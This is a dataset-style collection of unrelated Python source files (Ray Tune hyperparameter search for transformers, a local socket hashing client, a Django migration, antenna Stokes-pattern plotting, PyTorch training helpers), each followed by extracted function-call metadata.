) if data_args.block_size <= 0: data_args.block_size = tokenizer.max_len # Our input block size will be the max possible for the model else: data_args.block_size = min(data_args.block_size, tokenizer.max_len) # Get datasets train_dataset = ( get_dataset(data_args, tokenizer=tokenizer, cache_dir=model_args.cache_dir) if training_args.do_train else None ) # print('train_dataset {}'.format(train_dataset.examples[0])) eval_dataset = ( get_dataset(data_args, tokenizer=tokenizer, evaluate=True, cache_dir=model_args.cache_dir) if training_args.do_eval else None ) if config_in.model_type == "xlnet": data_collator = DataCollatorForPermutationLanguageModeling( tokenizer=tokenizer, plm_probability=data_args.plm_probability, max_span_length=data_args.max_span_length, ) else: data_collator = DataCollatorForLanguageModeling( tokenizer=tokenizer, mlm=data_args.mlm, mlm_probability=data_args.mlm_probability ) training_args = TrainingArguments( output_dir=tune.get_trial_dir(), learning_rate=config["learning_rate"], do_train=True, do_eval=True, evaluate_during_training=True, # Run eval after every epoch. eval_steps=(len(train_dataset) // config["per_gpu_train_batch_size"]) + 1, # We explicitly set save to 0, and do checkpointing in evaluate instead save_steps=0, num_train_epochs=config["num_epochs"], max_steps=config["max_steps"], per_device_train_batch_size=config["per_gpu_train_batch_size"], per_device_eval_batch_size=config["per_gpu_val_batch_size"], warmup_steps=0, weight_decay=config["weight_decay"], logging_dir="./logs") # Initialize our Trainer tune_trainer = TuneTransformerTrainer( model=model, args=training_args, data_collator=data_collator, train_dataset=train_dataset, eval_dataset=eval_dataset, prediction_loss_only=True, # compute_metrics=compute_metrics, ) if training_args.do_train: model_path = ( model_args.model_name_or_path if model_args.model_name_or_path is not None and os.path.isdir(model_args.model_name_or_path) else None ) tune_trainer.train(model_path=model_path) if __name__ == "__main__": parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments)) model_args, data_args, training_args = parser.parse_args_into_dataclasses() config = { # These 3 configs below were defined earlier "model_name": model_args.model_name_or_path, "task_name": "CLM", "data_dir": "", "per_gpu_val_batch_size": 32, "per_gpu_train_batch_size": tune.choice([16, 32, 64]), "learning_rate": tune.uniform(1e-5, 5e-5), "weight_decay": tune.uniform(0.0, 0.3), "num_epochs": tune.choice([2, 3, 4, 5]), "max_steps": -1, # We use num_epochs instead. 
"wandb": { "project": "pbt_transformers", "reinit": True, "allow_val_change": True } } logger.info(config) scheduler = PopulationBasedTraining( time_attr="training_iteration", metric="eval_loss", mode="min", perturbation_interval=2, hyperparam_mutations={ "weight_decay": lambda: tune.uniform(0.0, 0.3).func(None), "learning_rate": lambda: tune.uniform(1e-5, 5e-5).func(None), "per_gpu_train_batch_size": [16, 32, 64], }) reporter = CLIReporter( parameter_columns={ "weight_decay": "w_decay", "learning_rate": "lr", "per_gpu_train_batch_size": "train_bs/gpu", "num_epochs": "num_epochs" }, metric_columns=[ "eval_acc", "eval_loss", "epoch", "training_iteration" ]) analysis = tune.run( train_transformer, resources_per_trial={ "cpu": 1, "gpu": 1 }, config=config, num_samples=3, scheduler=scheduler, keep_checkpoints_num=3, checkpoint_score_attr="training_iteration", progress_reporter=reporter, local_dir="./ray_results/", name="tune_trans") best_config = analysis.get_best_config(metric="eval_loss", mode="min") print(best_config)
[((57, 0, 57, 14), 'ray.shutdown', 'ray.shutdown', ({}, {}), '()', False, 'import ray\n'), ((58, 0, 58, 54), 'ray.init', 'ray.init', (), '', False, 'import ray\n'), ((60, 9, 60, 36), 'logging.getLogger', 'logging.getLogger', ({(60, 27, 60, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((63, 28, 63, 61), 'transformers.MODEL_WITH_LM_HEAD_MAPPING.keys', 'MODEL_WITH_LM_HEAD_MAPPING.keys', ({}, {}), '()', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((73, 40, 78, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((83, 33, 85, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((86, 36, 88, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((89, 31, 91, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((92, 28, 97, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((98, 36, 100, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((109, 37, 111, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((112, 36, 115, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((116, 25, 119, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((121, 16, 123, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((124, 29, 126, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((127, 29, 132, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((133, 27, 135, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((137, 22, 144, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((145, 28, 147, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((312, 4, 316, 5), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((328, 4, 328, 32), 'transformers.set_seed', 'set_seed', ({(328, 13, 328, 31): 'training_args.seed'}, {}), '(training_args.seed)', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((457, 13, 457, 89), 'transformers.HfArgumentParser', 'HfArgumentParser', ({(457, 30, 457, 88): '(ModelArguments, DataTrainingArguments, TrainingArguments)'}, {}), '((ModelArguments, DataTrainingArguments, TrainingArguments))', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((490, 15, 499, 12), 'ray.tune.CLIReporter', 
'CLIReporter', (), '', False, 'from ray.tune import CLIReporter\n'), ((501, 15, 514, 28), 'ray.tune.run', 'tune.run', (), '', False, 'from ray import tune\n'), ((158, 15, 158, 106), 'transformers.LineByLineTextDataset', 'LineByLineTextDataset', (), '', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((161, 15, 167, 9), 'transformers.TextDataset', 'TextDataset', (), '', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((206, 8, 206, 37), 'ray.tune.report', 'tune.report', ({}, {}), '(**output.metrics)', False, 'from ray import tune\n'), ((231, 8, 231, 47), 'os.path.join', 'os.path.join', ({(231, 21, 231, 40): 'tune_checkpoint_dir', (231, 42, 231, 46): 'name'}, {}), '(tune_checkpoint_dir, name)', False, 'import os\n'), ((302, 8, 302, 48), 'os.path.exists', 'os.path.exists', ({(302, 23, 302, 47): 'training_args.output_dir'}, {}), '(training_args.output_dir)', False, 'import os\n'), ((303, 12, 303, 48), 'os.listdir', 'os.listdir', ({(303, 23, 303, 47): 'training_args.output_dir'}, {}), '(training_args.output_dir)', False, 'import os\n'), ((337, 20, 337, 102), 'transformers.AutoConfig.from_pretrained', 'AutoConfig.from_pretrained', (), '', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((345, 20, 345, 108), 'transformers.AutoTokenizer.from_pretrained', 'AutoTokenizer.from_pretrained', (), '', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((375, 16, 375, 58), 'transformers.AutoModelWithLMHead.from_config', 'AutoModelWithLMHead.from_config', ({(375, 48, 375, 57): 'config_in'}, {}), '(config_in)', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((407, 24, 411, 9), 'transformers.DataCollatorForPermutationLanguageModeling', 'DataCollatorForPermutationLanguageModeling', (), '', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((413, 24, 415, 9), 'transformers.DataCollatorForLanguageModeling', 'DataCollatorForLanguageModeling', (), '', False, 'from transformers import CONFIG_MAPPING, 
MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((466, 34, 466, 59), 'ray.tune.choice', 'tune.choice', ({(466, 46, 466, 58): '[16, 32, 64]'}, {}), '([16, 32, 64])', False, 'from ray import tune\n'), ((467, 23, 467, 47), 'ray.tune.uniform', 'tune.uniform', ({(467, 36, 467, 40): '(1e-05)', (467, 42, 467, 46): '(5e-05)'}, {}), '(1e-05, 5e-05)', False, 'from ray import tune\n'), ((468, 22, 468, 44), 'ray.tune.uniform', 'tune.uniform', ({(468, 35, 468, 38): '(0.0)', (468, 40, 468, 43): '(0.3)'}, {}), '(0.0, 0.3)', False, 'from ray import tune\n'), ((469, 20, 469, 45), 'ray.tune.choice', 'tune.choice', ({(469, 32, 469, 44): '[2, 3, 4, 5]'}, {}), '([2, 3, 4, 5])', False, 'from ray import tune\n'), ((185, 29, 190, 13), 'transformers.optimization.AdamW', 'AdamW', (), '', False, 'from transformers.optimization import AdamW, get_linear_schedule_with_warmup\n'), ((192, 32, 194, 13), 'transformers.optimization.get_linear_schedule_with_warmup', 'get_linear_schedule_with_warmup', (), '', False, 'from transformers.optimization import AdamW, get_linear_schedule_with_warmup\n'), ((211, 13, 211, 55), 'ray.tune.checkpoint_dir', 'tune.checkpoint_dir', (), '', False, 'from ray import tune\n'), ((214, 25, 216, 62), 'os.path.join', 'os.path.join', ({(215, 16, 215, 36): 'self.args.output_dir', (216, 16, 216, 61): 'f"""{PREFIX_CHECKPOINT_DIR}-{self.global_step}"""'}, {}), "(self.args.output_dir,\n f'{PREFIX_CHECKPOINT_DIR}-{self.global_step}')", False, 'import os\n'), ((232, 20, 232, 51), 'os.listdir', 'os.listdir', ({(232, 31, 232, 50): 'tune_checkpoint_dir'}, {}), '(tune_checkpoint_dir)', False, 'import os\n'), ((339, 20, 339, 109), 'transformers.AutoConfig.from_pretrained', 'AutoConfig.from_pretrained', (), '', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((347, 20, 347, 112), 'transformers.AutoTokenizer.from_pretrained', 'AutoTokenizer.from_pretrained', (), '', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((418, 19, 418, 39), 'ray.tune.get_trial_dir', 'tune.get_trial_dir', ({}, {}), '()', False, 'from ray import tune\n'), ((233, 25, 233, 64), 'os.path.join', 'os.path.join', ({(233, 38, 233, 57): 'tune_checkpoint_dir', (233, 59, 233, 63): 'name'}, {}), '(tune_checkpoint_dir, name)', False, 'import os\n'), ((449, 61, 449, 105), 'os.path.isdir', 'os.path.isdir', ({(449, 75, 449, 104): 'model_args.model_name_or_path'}, {}), '(model_args.model_name_or_path)', False, 'import os\n'), ((221, 27, 221, 67), 'os.path.join', 'os.path.join', ({(221, 40, 221, 50): 'output_dir', (221, 52, 221, 66): '"""optimizer.pt"""'}, {}), "(output_dir, 'optimizer.pt')", False, 'import os\n'), ((223, 27, 223, 67), 'os.path.join', 'os.path.join', ({(223, 40, 223, 50): 'output_dir', (223, 52, 223, 66): '"""scheduler.pt"""'}, {}), "(output_dir, 'scheduler.pt')", False, 'import os\n'), 
((485, 38, 485, 60), 'ray.tune.uniform', 'tune.uniform', ({(485, 51, 485, 54): '0.0', (485, 56, 485, 59): '0.3'}, {}), '(0.0, 0.3)', False, 'from ray import tune\n'), ((486, 39, 486, 63), 'ray.tune.uniform', 'tune.uniform', ({(486, 52, 486, 56): '1e-05', (486, 58, 486, 62): '5e-05'}, {}), '(1e-05, 5e-05)', False, 'from ray import tune\n')]
pgp/RootHelperClientTestInteractions
checksums.py
6b9e9cc9f10eb2bf9b9dafa851ed56005f7666b5
from net_common import * import struct import sys def getDirHashOpts(withNames=False, ignoreThumbsFiles=True, ignoreUnixHiddenFiles=True, ignoreEmptyDirs=True): return bytearray([((1 if withNames else 0) + (2 if ignoreThumbsFiles else 0) + (4 if ignoreUnixHiddenFiles else 0) + (8 if ignoreEmptyDirs else 0))]) if __name__ == "__main__": sock = get_connected_local_socket() path = encodeString('/dev/shm/exampleDir') # path = encodeString('/dev/null') sock.sendall(bytearray(b'\x0A')) # HASH request # sock.sendall(bytearray(b'\x01')) # choose MD5 algorithm sock.sendall(bytearray(b'\x06')) # choose SHA3-224 algorithm sock.sendall(getDirHashOpts(withNames=True,ignoreUnixHiddenFiles=False)) # send dirHashOpts byte (unused for regular files) sock.sendall(struct.pack("@H", len(path))) # len of path as unsigned short sock.sendall(path) resp = sock.recv(1) # response first byte: \x00 OK or \xFF ERROR if resp != b'\x00': print("Error byte received, errno is:", struct.unpack("@i", sock.recv(4))[0]) sys.exit(0) # print(toHex(sock.recv(16))) # 128 bit (16 byte) md5 digest size print(toHex(sock.recv(28))) # 224 bit (28 byte) sha3-224 digest size sock.close()
[((30, 8, 30, 19), 'sys.exit', 'sys.exit', ({(30, 17, 30, 18): '(0)'}, {}), '(0)', False, 'import sys\n')]
uktrade/pir-api
investment_report/migrations/0020_auto_20180911_1005.py
79747ceab042c42c287e2b7471f6dade70f68693
# -*- coding: utf-8 -*- # Generated by Django 1.11.13 on 2018-09-11 10:05 from __future__ import unicode_literals import config.s3 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('investment_report', '0019_auto_20180820_1304'), ] operations = [ migrations.AddField( model_name='contact', name='website_href', field=models.URLField(default='https://invest.great.gov.uk/contact/', help_text='Custom link for website (used for tracking)', max_length=255), preserve_default=False, ) ]
[((19, 18, 19, 154), 'django.db.models.URLField', 'models.URLField', (), '', False, 'from django.db import migrations, models\n')]
whalesalad/filprofiler
tests/test-scripts/threadpools.py
9c12cbe62ad1fed5d59d923013739bb3377bc24c
"""Validate that number of threads in thread pools is set to 1.""" import numexpr import blosc import threadpoolctl # APIs that return previous number of threads: assert numexpr.set_num_threads(2) == 1 assert blosc.set_nthreads(2) == 1 for d in threadpoolctl.threadpool_info(): assert d["num_threads"] == 1, d
[((11, 9, 11, 40), 'threadpoolctl.threadpool_info', 'threadpoolctl.threadpool_info', ({}, {}), '()', False, 'import threadpoolctl\n'), ((8, 7, 8, 33), 'numexpr.set_num_threads', 'numexpr.set_num_threads', ({(8, 31, 8, 32): '(2)'}, {}), '(2)', False, 'import numexpr\n'), ((9, 7, 9, 28), 'blosc.set_nthreads', 'blosc.set_nthreads', ({(9, 26, 9, 27): '(2)'}, {}), '(2)', False, 'import blosc\n')]
David-McKenna/AntPat
scripts/viewStokespat.py
45618659994b27e2654f1effd6d9baa15867b6d3
#!/usr/bin/env python """A simple viewer for Stokes patterns based on two far-field pattern files. (Possibly based on one FF pattern files if it has two requests: one for each polarization channel.)""" import os import argparse import numpy import matplotlib.pyplot as plt from antpat.reps.sphgridfun.tvecfun import TVecFields from antpat.radfarfield import RadFarField from antpat.dualpolelem import DualPolElem FEKOsuffix = 'ffe' GRASPsuffix = 'swe' NECsuffix = 'out' def Jones2Stokes(Jones): """Convert Jones matrix to Stokes vector. This assumes dual-pol antenna receiving unpolarized unit valued radiation i.e. incoming Stokes = (1,0,0,0).""" brightmat = numpy.matmul(Jones, numpy.swapaxes(numpy.conjugate(Jones),-1,-2)) StokesI = numpy.real(brightmat[...,0,0]+brightmat[...,1,1]) StokesQ = numpy.real(brightmat[...,0,0]-brightmat[...,1,1]) StokesU = numpy.real(brightmat[...,0,1]+brightmat[...,1,0]) StokesV = numpy.imag(brightmat[...,0,1]-brightmat[...,1,0]) return StokesI, StokesQ, StokesU, StokesV def plotStokes_fromFEKOfiles(p_chan_file, q_chan_file, freq): (tvf_p, tvf_q) = (TVecFields(), TVecFields()) tvf_p.load_ffe(p_chan_file) tvf_q.load_ffe(q_chan_file) (ant_p, ant_q) = (RadFarField(tvf_p), RadFarField(tvf_q)) (p_chan_name, q_chan_name) = (os.path.basename(p_chan_file), os.path.basename(q_chan_file)) (ant_p.name, ant_q.name) = (p_chan_name, q_chan_name) dualpolAnt = DualPolElem(ant_p, ant_q) THETA, PHI, Jones = dualpolAnt.getJonesPat(freq) (StokesI, StokesQ, StokesU, StokesV) = Jones2Stokes(Jones) x = THETA*numpy.cos(PHI) y = THETA*numpy.sin(PHI) #x= THETA #y=PHI xyNames = ('theta*cos(phi)','theta*sin(phi)') fig = plt.figure() ax1 = fig.add_subplot(221) plt.pcolormesh(x, y, 10*numpy.log10(StokesI), label="I") #plt.pcolormesh(x, y, StokesI, label="I") plt.colorbar() ax1.set_title('I (dB)') ax2 = fig.add_subplot(222) plt.pcolormesh(x, y, StokesQ/StokesI, label="Q") plt.colorbar() ax2.set_title('Q/I') ax3 = fig.add_subplot(223) plt.pcolormesh(x, y, StokesU/StokesI, label="U") plt.colorbar() ax3.set_title('U/I') ax4 = fig.add_subplot(224) plt.pcolormesh(x, y, StokesV/StokesI, label="V") plt.colorbar() ax4.set_title('V/I') fig.suptitle('Stokes (azimuthal-equidistant proj) @ ' +str(freq/1e9)+' GHz') plt.show() if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("p_chan_file", help='Filename of polarization channel p') parser.add_argument("q_chan_file", help='Filename of polarization channel p') parser.add_argument("freq", nargs='?', type=float, help="Frequency in Hertz") args = parser.parse_args() if args.p_chan_file.endswith(FEKOsuffix): plotStokes_fromFEKOfiles(args.p_chan_file, args.q_chan_file, args.freq) elif args.p_chan_file.endswith(GRASPsuffix): print("Not implemented yet.") elif args.p_chan_file.endswith(NECsuffix): print("Not implemented yet.") else: print("Far-field pattern file type not known") exit(1)
[((22, 14, 22, 63), 'numpy.real', 'numpy.real', ({(22, 25, 22, 62): 'brightmat[..., 0, 0] + brightmat[..., 1, 1]'}, {}), '(brightmat[..., 0, 0] + brightmat[..., 1, 1])', False, 'import numpy\n'), ((23, 14, 23, 63), 'numpy.real', 'numpy.real', ({(23, 25, 23, 62): 'brightmat[..., 0, 0] - brightmat[..., 1, 1]'}, {}), '(brightmat[..., 0, 0] - brightmat[..., 1, 1])', False, 'import numpy\n'), ((24, 14, 24, 63), 'numpy.real', 'numpy.real', ({(24, 25, 24, 62): 'brightmat[..., 0, 1] + brightmat[..., 1, 0]'}, {}), '(brightmat[..., 0, 1] + brightmat[..., 1, 0])', False, 'import numpy\n'), ((25, 14, 25, 63), 'numpy.imag', 'numpy.imag', ({(25, 25, 25, 62): 'brightmat[..., 0, 1] - brightmat[..., 1, 0]'}, {}), '(brightmat[..., 0, 1] - brightmat[..., 1, 0])', False, 'import numpy\n'), ((36, 17, 36, 42), 'antpat.dualpolelem.DualPolElem', 'DualPolElem', ({(36, 29, 36, 34): 'ant_p', (36, 36, 36, 41): 'ant_q'}, {}), '(ant_p, ant_q)', False, 'from antpat.dualpolelem import DualPolElem\n'), ((45, 10, 45, 22), 'matplotlib.pyplot.figure', 'plt.figure', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((49, 4, 49, 18), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((53, 4, 53, 52), 'matplotlib.pyplot.pcolormesh', 'plt.pcolormesh', (), '', True, 'import matplotlib.pyplot as plt\n'), ((54, 4, 54, 18), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((58, 4, 58, 52), 'matplotlib.pyplot.pcolormesh', 'plt.pcolormesh', (), '', True, 'import matplotlib.pyplot as plt\n'), ((59, 4, 59, 18), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((63, 4, 63, 52), 'matplotlib.pyplot.pcolormesh', 'plt.pcolormesh', (), '', True, 'import matplotlib.pyplot as plt\n'), ((64, 4, 64, 18), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((67, 4, 67, 14), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((71, 13, 71, 38), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((30, 22, 30, 34), 'antpat.reps.sphgridfun.tvecfun.TVecFields', 'TVecFields', ({}, {}), '()', False, 'from antpat.reps.sphgridfun.tvecfun import TVecFields\n'), ((30, 36, 30, 48), 'antpat.reps.sphgridfun.tvecfun.TVecFields', 'TVecFields', ({}, {}), '()', False, 'from antpat.reps.sphgridfun.tvecfun import TVecFields\n'), ((33, 22, 33, 40), 'antpat.radfarfield.RadFarField', 'RadFarField', ({(33, 34, 33, 39): 'tvf_p'}, {}), '(tvf_p)', False, 'from antpat.radfarfield import RadFarField\n'), ((33, 42, 33, 60), 'antpat.radfarfield.RadFarField', 'RadFarField', ({(33, 54, 33, 59): 'tvf_q'}, {}), '(tvf_q)', False, 'from antpat.radfarfield import RadFarField\n'), ((34, 34, 34, 63), 'os.path.basename', 'os.path.basename', ({(34, 51, 34, 62): 'p_chan_file'}, {}), '(p_chan_file)', False, 'import os\n'), ((34, 65, 34, 94), 'os.path.basename', 'os.path.basename', ({(34, 82, 34, 93): 'q_chan_file'}, {}), '(q_chan_file)', False, 'import os\n'), ((40, 14, 40, 28), 'numpy.cos', 'numpy.cos', ({(40, 24, 40, 27): 'PHI'}, {}), '(PHI)', False, 'import numpy\n'), ((41, 14, 41, 28), 'numpy.sin', 'numpy.sin', ({(41, 24, 41, 27): 'PHI'}, {}), '(PHI)', False, 'import numpy\n'), ((21, 51, 21, 73), 'numpy.conjugate', 'numpy.conjugate', ({(21, 67, 21, 72): 'Jones'}, {}), '(Jones)', False, 'import numpy\n'), ((47, 28, 47, 48), 'numpy.log10', 'numpy.log10', ({(47, 40, 
47, 47): 'StokesI'}, {}), '(StokesI)', False, 'import numpy\n')]
lingjiao10/Facial-Expression-Recognition.Pytorch
utils.py
f5ba0e527347af3778d44eb7045e4970d01641a6
'''Some helper functions for PyTorch, including:
    - progress_bar: progress bar mimic xlua.progress.
    - set_lr : set the learning rate
    - clip_gradient : clip gradient
'''
import os
import sys
import time
import math

import torch
import torch.nn as nn
import torch.nn.init as init
from torch.autograd import Function

# Get the number of rows and columns of the console
if sys.platform == 'win32':
    term_width = 80
else:
    print('###', os.popen('stty size', 'r').read())
    _, term_width = os.popen('stty size', 'r').read().split()
    term_width = int(term_width)

TOTAL_BAR_LENGTH = 30.
last_time = time.time()
begin_time = last_time

#[==>........ 19/225 ...........] | Loss: 1.961 | Acc: 22.000% (537/2432)
def progress_bar(current, total, msg=None):
    global last_time, begin_time
    if current == 0:
        begin_time = time.time()  # Reset for new bar.

    cur_len = int(TOTAL_BAR_LENGTH*current/total)
    rest_len = int(TOTAL_BAR_LENGTH - cur_len) - 1

    sys.stdout.write(' [')
    for i in range(cur_len):
        sys.stdout.write('=')
    sys.stdout.write('>')
    for i in range(rest_len):
        sys.stdout.write('.')
    sys.stdout.write(']')

    cur_time = time.time()
    step_time = cur_time - last_time
    last_time = cur_time
    tot_time = cur_time - begin_time

    L = []
    if msg:
        L.append(' | ' + msg)

    msg = ''.join(L)
    sys.stdout.write(msg)
    for i in range(term_width-int(TOTAL_BAR_LENGTH)-len(msg)-3):
        sys.stdout.write(' ')

    # Go back to the center of the bar.
    for i in range(term_width-int(TOTAL_BAR_LENGTH/2)+2):
        sys.stdout.write('\b')
    sys.stdout.write(' %d/%d ' % (current+1, total))

    if current < total-1:
        sys.stdout.write('\r')
    else:
        sys.stdout.write('\n')
    sys.stdout.flush()


def set_lr(optimizer, lr):
    for group in optimizer.param_groups:
        group['lr'] = lr


def clip_gradient(optimizer, grad_clip):
    for group in optimizer.param_groups:
        #print(group['params'])
        for param in group['params']:
            param.grad.data.clamp_(-grad_clip, grad_clip)
[((25, 12, 25, 23), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((37, 4, 37, 26), 'sys.stdout.write', 'sys.stdout.write', ({(37, 21, 37, 25): '""" ["""'}, {}), "(' [')", False, 'import sys\n'), ((40, 4, 40, 25), 'sys.stdout.write', 'sys.stdout.write', ({(40, 21, 40, 24): '""">"""'}, {}), "('>')", False, 'import sys\n'), ((43, 4, 43, 25), 'sys.stdout.write', 'sys.stdout.write', ({(43, 21, 43, 24): '"""]"""'}, {}), "(']')", False, 'import sys\n'), ((45, 15, 45, 26), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((55, 4, 55, 25), 'sys.stdout.write', 'sys.stdout.write', ({(55, 21, 55, 24): 'msg'}, {}), '(msg)', False, 'import sys\n'), ((62, 4, 62, 52), 'sys.stdout.write', 'sys.stdout.write', ({(62, 21, 62, 51): "(' %d/%d ' % (current + 1, total))"}, {}), "(' %d/%d ' % (current + 1, total))", False, 'import sys\n'), ((68, 4, 68, 22), 'sys.stdout.flush', 'sys.stdout.flush', ({}, {}), '()', False, 'import sys\n'), ((32, 21, 32, 32), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((39, 8, 39, 29), 'sys.stdout.write', 'sys.stdout.write', ({(39, 25, 39, 28): '"""="""'}, {}), "('=')", False, 'import sys\n'), ((42, 8, 42, 29), 'sys.stdout.write', 'sys.stdout.write', ({(42, 25, 42, 28): '"""."""'}, {}), "('.')", False, 'import sys\n'), ((57, 8, 57, 29), 'sys.stdout.write', 'sys.stdout.write', ({(57, 25, 57, 28): '""" """'}, {}), "(' ')", False, 'import sys\n'), ((61, 8, 61, 30), 'sys.stdout.write', 'sys.stdout.write', ({(61, 25, 61, 29): '"""\x08"""'}, {}), "('\\x08')", False, 'import sys\n'), ((65, 8, 65, 30), 'sys.stdout.write', 'sys.stdout.write', ({(65, 25, 65, 29): "'\\r'"}, {}), "('\\r')", False, 'import sys\n'), ((67, 8, 67, 30), 'sys.stdout.write', 'sys.stdout.write', ({(67, 25, 67, 29): '"""\n"""'}, {}), "('\\n')", False, 'import sys\n'), ((20, 14, 20, 40), 'os.popen', 'os.popen', ({(20, 23, 20, 34): '"""stty size"""', (20, 36, 20, 39): '"""r"""'}, {}), "('stty size', 'r')", False, 'import os\n'), ((21, 17, 21, 43), 'os.popen', 'os.popen', ({(21, 26, 21, 37): '"""stty size"""', (21, 39, 21, 42): '"""r"""'}, {}), "('stty size', 'r')", False, 'import os\n')]
delemottelab/gpcr-string-method-2019
string-method/src/analysis/FE_analysis/index_converter.py
b50786a4a8747d56ad04ede525592eb31f1890fd
from __future__ import absolute_import, division, print_function

import logging
import sys

logging.basicConfig(
    stream=sys.stdout,
    level=logging.DEBUG,
    format='%(asctime)s %(name)s-%(levelname)s: %(message)s',
    datefmt='%Y-%m-%d %H:%M:%S')
import numpy as np
import utils
logger = logging.getLogger("indexconverter")


class IndexConverter(object):
    def __init__(self, ndim, ngrid):
        self.ndim = ndim
        self.ngrid = ngrid
